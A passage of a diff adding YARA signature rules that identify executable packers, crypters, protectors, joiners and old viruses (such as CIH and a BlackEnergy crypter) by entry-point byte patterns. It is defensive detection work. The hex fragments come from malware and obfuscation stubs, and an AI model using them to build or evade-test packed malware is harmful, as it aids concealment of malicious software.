+	$a1 = { C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxHafen809
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 1C ?? 81 EE ?? ?? 50 1E 06 8C C8 8E D8 06 33 C0 8E C0 26 ?? ?? ?? 07 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117LZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 73 26 00 00 8D 9D 58 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01LTC13Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectv141
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 76 03 77 01 7B 74 03 75 01 78 47 87 EE E8 01 00 00 00 76 83 C4 04 85 EE EB 01 7F 85 F2 EB 01 79 0F 86 01 00 00 00 FC EB 01 78 79 02 87 F2 61 51 8F 05 19 38 01 01 60 EB 01 E9 E9 01 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV1031AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 74 72 42 00 8B D5 81 C2 C3 72 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3F A9 42 00 81 E9 6E 73 42 00 8B D5 81 C2 6E 73 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 98 2E 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock096tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 59 E4 FF FF 00 00 00 00 00 00 00 ?? ?? ?? ?? EE ?? ?? 00 00 00 00 00 00 00 00 00 0E ?? ?? 00 FE ?? ?? 00 F6 ?? ?? 00 00 00 00 00 00 00 00 00 1B ?? ?? 00 06 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 ?? ?? 00 00 00 00 00 39 ?? ?? 00 00 00 00 00 26 ?? ?? 00 00 00 00 00 39 ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WerusCrypter10byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB E8 12 40 00 80 33 05 E9 7D FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HEALTHv51byMuslimMPolyak
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E E8 ?? ?? 2E 8C 06 ?? ?? 2E 89 3E ?? ?? 8B D7 B8 ?? ?? CD 21 8B D8 0E 1F E8 ?? ?? 06 57 A1 ?? ?? 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCGuardv303dv305d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 50 E8 ?? ?? ?? ?? 5D EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxNovember17768
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? 50 33 C0 8E D8 80 3E ?? ?? ?? 0E 1F ?? ?? FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoTinyPascalBeRo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 20 43 6F 6D 70 69 6C 65 64 20 62 79 3A 20 42 65 52 6F 54 69 6E 79 50 61 73 63 61 6C 20 2D 20 28 43 29 20 43 6F 70 79 72 69 67 68 74 20 32 30 30 36 2C 20 42 65 6E 6A 61 6D 69 6E 20 27 42 65 52 6F 27 20 52 6F 73 73 65 61 75 78 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateexeProtector21522XSetiSoftTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Protectorv1111DDeMPEEnginev09DDeMCIv092
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 56 E8 00 00 00 00 5B 81 EB 08 10 00 00 8D B3 34 10 00 00 B9 F3 03 00 00 BA 63 17 2A EE 31 16 83 C6 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01XCR011Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 8B F0 33 DB 83 C3 01 83 C0 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Trivial173bySMTSMF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? ?? 28 54 72 69 76 69 61 6C 31 37 33 20 62 79 20 53 4D 54 2F 53 4D 46 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv11MTE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WARNINGTROJANRobinPE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PiCryptor10byScofield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 57 31 C0 89 45 EC B8 40 1E 06 00 E8 48 FA FF FF 33 C0 55 68 36 1F 06 00 64 FF 30 64 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 31 C0 E8 4E F4 FF FF 8B 45 EC E8 F6 F7 FF FF 50 E8 CC FA FF FF 8B D8 83 FB FF 74 4E 6A 00 53 E8 CD FA FF FF 8B F8 81 EF AC 26 00 00 6A 00 6A 00 68 AC 26 00 00 53 E8 DE FA FF FF 89 F8 E8 E3 F1 FF FF 89 C6 6A 00 68 28 31 06 00 57 56 53 E8 AE FA FF FF 53 E8 80 FA FF FF 89 FA 81 EA 72 01 00 00 8B C6 E8 55 FE FF FF 89 C6 89 F0 09 C0 74 05 E8 A8 FB FF FF 31 C0 }
+	$a1 = { 55 8B EC 83 C4 EC 53 56 57 31 C0 89 45 EC B8 40 1E 06 00 E8 48 FA FF FF 33 C0 55 68 36 1F 06 00 64 FF 30 64 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 31 C0 E8 4E F4 FF FF 8B 45 EC E8 F6 F7 FF FF 50 E8 CC FA FF FF 8B D8 83 FB FF 74 4E 6A 00 53 E8 CD FA FF FF 8B F8 81 EF AC 26 00 00 6A 00 6A 00 68 AC 26 00 00 53 E8 DE FA FF FF 89 F8 E8 E3 F1 FF FF 89 C6 6A 00 68 28 31 06 00 57 56 53 E8 AE FA FF FF 53 E8 80 FA FF FF 89 FA 81 EA 72 01 00 00 8B C6 E8 55 FE FF FF 89 C6 89 F0 09 C0 74 05 E8 A8 FB FF FF 31 C0 5A 59 59 64 89 10 68 3D 1F 06 00 8D 45 EC E8 C3 F6 FF FF C3 }
+	$a2 = { 89 55 F8 BB 01 00 00 00 8A 04 1F 24 0F 8B 55 FC 8A 14 32 80 E2 0F 32 C2 8A 14 1F 80 E2 F0 02 D0 88 14 1F 46 8D 45 F4 8B 55 FC E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 3B F0 7E 05 BE 01 00 00 00 43 FF 4D F8 75 C2 ?? ?? ?? ?? 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 F4 E8 ?? ?? ?? ?? C3 E9 }
+
+condition:
+		$a0 or $a1 at pe.entry_point or $a2
+}
+	
+	
+rule PseudoSigner02MacromediaFlashProjector60Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeWWPack321xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32 20 64 65 63 6F 6D 70 72 65 73 73 69 6F 6E 20 72 6F 75 74 69 6E 65 20 76 65 72 73 69 6F 6E 20 31 2E 31 32 0D 0A 28 63 29 20 31 39 39 38 20 50 69 6F 74 72 20 57 61 72 65 7A 61 6B 20 61 6E 64 20 52 61 66 61 6C 20 57 69 65 72 7A 62 69 63 6B 69 0D 0A 0D 0A 5D 5B 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor07600765hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 00 08 00 00 00 00 00 00 00 60 E8 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PECryptv102
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ILUCRYPTv4015exe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC FA C7 46 F7 ?? ?? 42 81 FA ?? ?? 75 F9 FF 66 F7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoy13NEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 48 36 40 00 E8 54 EE FF FF 6A 00 68 D8 2B 40 00 6A 0A 6A 00 E8 2C EF FF FF E8 23 E7 FF FF 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VBOXv43v46
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 8B C5 }
+	$a1 = { 90 03 C4 33 C4 33 C5 2B C5 33 C5 8B C5 ?? ?? 2B C5 48 ?? ?? 0B C0 86 E0 8C E0 ?? ?? 8C E0 86 E0 03 C4 40 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule CodeLockvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CipherWallSelfExtratorDecryptorGUIv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 F9 89 C7 6A 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARMProtectorv01bySMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 01 00 8D 8D 92 31 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upackv037betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 37 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
+	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 37 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? ?? 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 D2 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B 7E 34 0F 82 8E FE FF FF 58 5F 59 E3 1B 8A 07 47 04 18 3C 02 73 F7 8B 07 3C ?? 75 F1 B0 00 0F C8 03 46 38 2B C7 AB E2 E5 5E 5D 59 51 59 46 AD 85 C0 74 1F }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PrivateExeProtector1xsetisoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? B9 ?? 90 01 ?? BE ?? 10 40 ?? 68 50 91 41 ?? 68 01 ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petitev14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20a0
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 56 57 FF 15 B4 10 40 00 05 E8 03 00 00 BE E0 E3 41 00 89 44 24 10 B3 20 FF 15 28 10 40 00 68 00 04 00 00 FF 15 14 11 40 00 50 56 FF 15 10 11 40 00 80 3D E0 E3 41 00 22 75 08 80 C3 02 BE E1 E3 41 00 8A 06 8B 3D 14 12 40 00 84 C0 74 19 3A C3 74 }
+
+condition:
+		$a0
+}
+	
+	
+rule Obsidium1332ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule modifiedHACKSTOPv111f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 B4 30 CD 21 52 FA ?? FB 3D ?? ?? EB ?? CD 20 0E 1F B4 09 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxKuku886
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 1E 50 8C C8 8E D8 BA 70 03 B8 24 25 CD 21 ?? ?? ?? ?? ?? 90 B4 2F CD 21 53 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxCIHVersion12TTITWIN95CIH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8D ?? ?? ?? 33 DB 64 87 03 E8 ?? ?? ?? ?? 5B 8D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ShegerdDongleV478MSCo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 32 00 00 00 B8 ?? ?? ?? ?? 8B 18 C1 CB 05 89 DA 36 8B 4C 24 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SmokesCryptv12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEncryptv31
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? 00 F0 0F C6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEncryptv30
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 81 ED 05 10 40 00 8D B5 24 10 40 00 8B FE B9 0F 00 00 00 BB ?? ?? ?? ?? AD 33 C3 E2 FA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RJoiner12byVaska250320071658
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 0C 02 00 00 8D 85 F4 FD FF FF 56 50 68 04 01 00 00 FF 15 14 10 40 00 90 8D 85 F4 FD FF FF 50 FF 15 10 10 40 00 90 BE 00 20 40 00 90 83 3E FF 0F 84 84 00 00 00 53 57 33 FF 8D 46 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Minke101byCodius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 ?? ?? ?? ?? ?? 10 E8 7A F6 FF FF BE 68 66 00 10 33 C0 55 68 DB 40 00 10 64 FF 30 64 89 20 E8 FA F8 FF FF BA EC 40 00 10 8B C6 E8 F2 FA FF FF 8B D8 B8 6C 66 00 10 8B 16 E8 88 F2 FF FF B8 6C 66 00 10 E8 76 F2 FF FF 8B D0 8B C3 8B 0E E8 E3 E4 FF FF E8 2A F9 FF FF E8 C1 F8 FF FF B8 6C 66 00 10 8B 16 E8 6D FA FF FF E8 14 F9 FF FF E8 AB F8 FF FF 8B 06 E8 B8 E3 FF FF 8B D8 B8 6C 66 00 10 E8 38 F2 FF FF 8B D3 8B 0E E8 A7 E4 FF ?? ?? ?? ?? C4 FB FF FF E8 E7 F8 FF FF 8B C3 E8 B0 E3 FF FF E8 DB F8 FF FF 33 C0 5A 59 59 64 89 10 68 E2 40 00 10 C3 E9 50 EB FF FF EB F8 5E 5B E8 BB EF FF FF 00 00 00 43 41 31 38 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrypWrapvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 B8 ?? ?? ?? E8 90 02 ?? ?? 83 F8 ?? 75 07 6A ?? E8 ?? ?? ?? ?? FF 15 49 8F 40 ?? A9 ?? ?? ?? 80 74 0E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WarningmaybeSimbyOZpolycryptorby3xpl01tver2xx250320072200
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 57 57 8D 7C 24 04 50 B8 00 D0 17 13 AB 58 5F C3 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WARNINGTROJANHuiGeZi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 C4 ?? FE FF FF 53 56 57 33 C0 89 85 ?? FE FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeyodascryptor12emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC 90 2C 8A C0 C0 78 90 04 62 EB 01 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EPv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 83 C0 17 8B F0 97 33 C0 33 C9 B1 24 AC 86 C4 AC AA 86 C4 AA E2 F6 00 B8 40 00 03 00 3C 40 D2 33 8B 66 14 50 70 8B 8D 34 02 44 8B 18 10 48 70 03 BA 0C ?? ?? ?? ?? C0 33 FE 8B 30 AC 30 D0 C1 F0 10 C2 D0 30 F0 30 C2 C1 AA 10 42 42 CA C1 E2 04 5F E9 5E B1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule D1S1Gv11betaD1N
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 0A 00 00 00 18 00 00 80 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 02 00 00 00 88 00 00 80 38 00 00 80 96 00 00 80 50 00 00 80 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 00 00 68 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 00 00 78 00 00 00 B0 ?? ?? 00 10 00 00 00 00 00 00 00 00 00 00 00 C0 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 06 00 44 00 56 00 43 00 4C 00 41 00 4C 00 0B 00 50 00 41 00 43 00 4B 00 41 00 47 00 45 00 49 00 4E 00 46 00 4F 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PROPACKv208
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C D3 8E C3 8C CA 8E DA 8B 0E ?? ?? 8B F1 83 ?? ?? 8B FE D1 ?? FD F3 A5 53 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BlackEnergyDDoSBotCrypter
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 ?? ?? 81 EC 1C 01 00 00 53 56 57 6A 04 BE 00 30 00 00 56 FF 35 00 20 11 13 6A 00 E8 ?? 03 00 00 ?? ?? 83 C4 10 ?? FF 89 7D F4 0F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv113
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 B8 ?? ?? 1E CD 21 86 E0 3D ?? ?? 73 ?? CD 20 0E 1F B4 09 E8 ?? ?? 24 ?? EA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoiner151GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 87 FF 90 90 B9 2B 00 00 00 BA 07 10 40 00 83 C2 03 90 87 FF 90 90 B9 04 00 00 00 90 87 FF 90 33 C9 C7 05 09 30 40 00 00 00 00 00 68 00 01 00 00 68 21 30 40 00 6A 00 E8 B7 02 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 68 21 30 40 00 E8 8F 02 00 00 A3 19 30 40 00 90 87 FF 90 8B 15 09 30 40 00 81 C2 04 01 00 00 F7 DA 6A 02 6A 00 52 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PeXv099EngbartCrackPl
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv119
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 BA ?? ?? 5A EB ?? 9A ?? ?? ?? ?? 30 CD 21 ?? ?? ?? D6 02 ?? ?? CD 20 0E 1F 52 BA ?? ?? 5A EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv118
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 BA ?? ?? 5A EB ?? 9A ?? ?? ?? ?? 30 CD 21 ?? ?? ?? FD 02 ?? ?? CD 20 0E 1F 52 BA ?? ?? 5A EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv200b
+{
+      meta:
+		author="malware-lu"
+strings:
